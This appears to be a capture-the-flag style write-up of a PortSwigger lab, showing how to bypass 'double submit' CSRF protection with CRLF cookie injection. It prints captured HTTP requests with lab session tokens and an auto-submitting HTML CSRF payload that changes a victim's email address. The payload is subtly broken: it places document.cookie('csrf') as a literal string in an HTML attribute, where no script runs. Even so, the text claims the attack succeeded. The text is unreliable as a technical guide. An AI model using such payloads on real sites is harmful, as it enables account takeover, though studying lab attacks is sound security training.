This lab's email change functionality is vulnerable to CSRF. It attempts to use the insecure "double submit" CSRF prevention technique.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You can log in to your own account using the following credentials: `wiener:peter`

# Practical
So let's login again, unhidden parameters set on Burp, take note of the value when logging in.
```txt
R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa
```
After logging in you'll see the same value at the email change.
Let's do this slowly and intercept the request.
```html
POST /login HTTP/1.1
Host: aca81f3b1fb7445c80fb0675006d007d.web-security-academy.net
Cookie: csrf=DvYQc2SNXPaoVXT0hH0503nEFFk6hP2G; session=BFoVvRO8uZVkSCvLgVufKpEcjcCYNTAA
Content-Length: 68
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://aca81f3b1fb7445c80fb0675006d007d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://aca81f3b1fb7445c80fb0675006d007d.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

csrf=DvYQc2SNXPaoVXT0hH0503nEFFk6hP2G&username=wiener&password=peter
```
So it set's a cookie which is also the same as the CSRF token.
Now let's send an email change.
```html
POST /my-account/change-email HTTP/1.1
Host: aca81f3b1fb7445c80fb0675006d007d.web-security-academy.net
Cookie: csrf=DvYQc2SNXPaoVXT0hH0503nEFFk6hP2G; session=Wgk8J6Eh8IefcVIYnA18AyrZ6JnTkLaj
Content-Length: 48
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://exploit-acb01f2e1f8f443280e3065301790095.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://exploit-acb01f2e1f8f443280e3065301790095.web-security-academy.net/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

email=test@gmail.com&crsf=DvYQc2SNXPaoVXT0hH0503nEFFk6hP2G
```
And if we you remember a bit of javascript, we can omit the cookie using document.cookie 

Let's start crafting our payload.
```html
<html>
  <body>
    <form action="https://aca81f3b1fb7445c80fb0675006d007d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
      <input type="hidden" name="csrf" value="document.cookie('csrf')"/>
    </form>
      <img src="https://aca81f3b1fb7445c80fb0675006d007d.web-security-academy.net/?search=ho%0d%0aSet-Cookie:%20 csrf=document.cookie('csrf')" onerror='document.forms[0].submit()';>
  </body>
</html>
```
For this to work, we need to set both the value of the cookie and the value of the token.
Since we know that the value should be in the cookies, we can just document.cookie('csrf')
Again if you don't understand the payload, please take a look at CRLF injection attack.

And sending this to our victim.
We changed it successfully and solved the lab.